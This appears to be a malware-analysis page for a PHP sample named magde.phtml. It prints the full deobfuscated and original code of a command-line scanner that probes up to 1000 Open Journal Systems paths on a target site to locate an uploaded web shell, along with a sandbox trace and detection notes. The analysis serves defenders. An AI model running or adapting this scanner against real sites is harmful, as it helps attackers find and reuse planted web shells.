PHP Malware Analysis

magde.phtml

md5: 97d1faa56027b1b906f604d67afabe4c



Deobfuscated PHP code

<?php

set_time_limit(0);
//error_reporting(0);
/**
 * Fetches $url with cURL and returns the response body.
 *
 * The scanner below calls this once per candidate path so the body can be
 * keyword-matched. No curl_close() is ever issued, so each call leaves a
 * handle open for the life of the process (up to 1000 of them in the loop).
 * No cURL options beyond RETURNTRANSFER are set, so TLS verification and
 * redirects stay at the extension's defaults.
 *
 * @param string $url full URL to request
 * @return string|false response body, or false when the request failed
 */
function ngcurl($url)
{
    $ch = curl_init($url);
    // Return the body to the caller instead of echoing it to stdout.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    return curl_exec($ch);
}
/**
 * Performs a second full GET of $url and returns only its HTTP status code.
 *
 * The body is read into $res but never used. Because the scanner calls this
 * after ngcurl() for every path whose body did not match, each miss costs the
 * target two requests — a detail worth knowing when reading the access log of
 * an affected host. The handle is not closed here either.
 *
 * @param string $url full URL to request
 * @return int HTTP status code (0 when no HTTP response was received)
 */
function respon_code($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $res = curl_exec($ch);
    return curl_getinfo($ch, CURLINFO_HTTP_CODE);
}
// Entry point. The script is driven from the command line via $argv, not by an
// HTTP request: $argv[1] is the base URL of the site to probe, $argv[2] the
// filename to look for. Both are read before the isset() guard, so running it
// with no arguments yields NULL for each (the execution trace on this page
// shows exactly that, and the loop never runs in the sandbox).
$url = $argv[1];
$shell = $argv[2];
// The filename is expected to be "<id>-<rest>"; the text before the first "-"
// becomes the article id used in the probed path.
$pecah = explode("-", $shell);
$id = $pecah[0];
if (isset($url) and isset($shell)) {
    // Iterates the journal id from 1 to 1000, one request pair per id.
    for ($x = 1; $x <= 1000; $x++) {
        // The path shape (files/journals/<n>/articles/<id>/submission/original/)
        // matches Open Journal Systems' submission-file storage layout —
        // presumably the targeted platform; confirm against the sample's origin.
        $link = "{$url}/files/journals/{$x}/articles/{$id}/submission/original/{$shell}";
        $cek = ngcurl($link);
        // A hit is a body containing common web-shell keywords, or an HTTP 200
        // (note the loose == between the int from curl_getinfo and the string
        // "200"). Detection note: this produces up to 1000 sequential GETs to
        // the same path prefix from one client, varying only the journal id,
        // with the misses showing as non-200 responses in the access log.
        if (preg_match("/shell|newfile|newfolder|pass|password|text|indoxploit|upload|eval|php|hacked|linux|windows|by|here/i", $cek) or respon_code($link) == "200") {
            echo "-> {$link}\n";
            break; // Only the first matching location is reported.
        }
    }
}

Execution traces

data/traces/97d1faa56027b1b906f604d67afabe4c_trace-1676248773.4452.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:39:59.343004]
1	0	1	0.000143	393528
1	3	0	0.000241	401248	{main}	1		/var/www/html/uploads/magde.phtml	0	0
2	4	0	0.000258	401248	set_time_limit	0		/var/www/html/uploads/magde.phtml	2	1	0
2	4	1	0.000276	401312
2	4	R			FALSE
1		A						/var/www/html/uploads/magde.phtml	18	$url = NULL
1		A						/var/www/html/uploads/magde.phtml	19	$shell = NULL
2	5	0	0.000334	401280	explode	0		/var/www/html/uploads/magde.phtml	20	2	'-'	NULL
2	5	1	0.000348	401728
2	5	R			[0 => '']
1		A						/var/www/html/uploads/magde.phtml	20	$pecah = [0 => '']
1		A						/var/www/html/uploads/magde.phtml	21	$id = ''
1	3	1	0.000385	401656
			0.000409	318016
TRACE END   [2023-02-12 22:39:59.343298]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
set_time_limit(0);
//error_reporting(0);
/**
 * Fetches $url with cURL and returns the response body.
 *
 * The curl_close() on the last line follows the return statement and is
 * therefore unreachable, so the handle is never released; the deobfuscated
 * listing above simply drops that dead line. No options beyond RETURNTRANSFER
 * are set, so TLS verification and redirect handling stay at the defaults.
 *
 * @param string $url full URL to request
 * @return string|false response body, or false when the request failed
 */
function ngcurl($url) {
	$ch = curl_init($url);
	  	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	return curl_exec($ch);
	  	  curl_close($ch); // unreachable: placed after return
}
/**
 * Performs a second full GET of $url and returns only its HTTP status code.
 *
 * $res receives the body but is never used. As in ngcurl(), the curl_close()
 * sits after the return and never executes, so the handle leaks. Each path
 * the scanner cannot keyword-match is thus requested twice.
 *
 * @param string $url full URL to request
 * @return int HTTP status code (0 when no HTTP response was received)
 */
function respon_code($url) {
	$ch = curl_init($url);
	  	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$res = curl_exec($ch);
	return curl_getinfo($ch, CURLINFO_HTTP_CODE);
	  	  curl_close($ch); // unreachable: placed after return
}

// Entry point, driven from the command line via $argv: $argv[1] is the base
// URL of the site to probe, $argv[2] the filename to look for. Both indexes
// are read before the isset() guard, so a missing argument yields NULL (the
// trace on this page shows $url = NULL, $shell = NULL and no loop iterations).
$url = $argv[1];
$shell = $argv[2];
// The filename is expected to be "<id>-<rest>"; the text before the first "-"
// is used as the article id in the probed path.
$pecah = explode("-", $shell);
$id = $pecah[0];
if(isset($url) AND isset($shell)) {
	// Iterates the journal id from 1 to 1000, probing one path per id.
	for($x = 1; $x <= 1000; $x++) {
		// Path shape (files/journals/<n>/articles/<id>/submission/original/)
		// matches Open Journal Systems' submission-file layout — presumably the
		// targeted platform; confirm against the sample's origin.
		$link = "$url/files/journals/$x/articles/$id/submission/original/$shell";
		$cek = ngcurl($link);
		// A hit is a body containing common web-shell keywords, or an HTTP 200
		// (loose == between curl_getinfo's int and the string "200").
		// Detection note: up to 1000 sequential GETs to the same path prefix,
		// varying only the journal id, from a single client.
		if(preg_match("/shell|newfile|newfolder|pass|password|text|indoxploit|upload|eval|php|hacked|linux|windows|by|here/i", $cek) OR respon_code($link) == "200") {
			echo "-> $link\n";
			break; // Only the first matching location is reported.
		}
	}
}
?>